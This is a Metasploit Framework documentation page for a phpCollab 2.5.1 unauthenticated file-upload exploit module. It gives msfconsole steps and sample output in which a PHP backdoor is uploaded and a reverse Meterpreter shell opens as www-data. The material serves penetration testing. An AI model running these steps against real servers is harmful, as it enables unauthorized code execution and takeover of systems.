CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/unix/webapp/phpcollab_upload_exec.md
Views: 11789

Vulnerable Application

This module exploits a file upload vulnerability in phpCollab 2.5.1 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the web server user.

The exploit has been tested on Ubuntu 16.04.3 64-bit

Vulnerable Application Installation

You can download the vulnerable application from the exploit-db page.

Follow the install instructions from the phpCollab website: http://phpcollab.com/documentation/install.htm.

The phpCollab application is only compatible with php5.

Verification Steps

msf > use exploit/unix/webapp/phpcollab_upload_exec
msf exploit(phpcollab_upload_exec) > set RHOST [IP Address] 
msf exploit(phpcollab_upload_exec) > set TARGETURI [Installation Directory] 
msf exploit(phpcollab_upload_exec) > exploit 

## Scenarios

[*] Started reverse TCP handler on 192.168.246.129:4444 
[*] Uploading backdoor file: 1.mEgUkeNnxP.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to 192.168.246.144
[*] Meterpreter session 1 opened (192.168.246.129:4444 -> 192.168.246.144:49264) at 2017-12-20 15:44:36 -0500
[+] Deleted 1.mEgUkeNnxP.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > pwd
/var/www/html/phpcollab/logos_clients
meterpreter >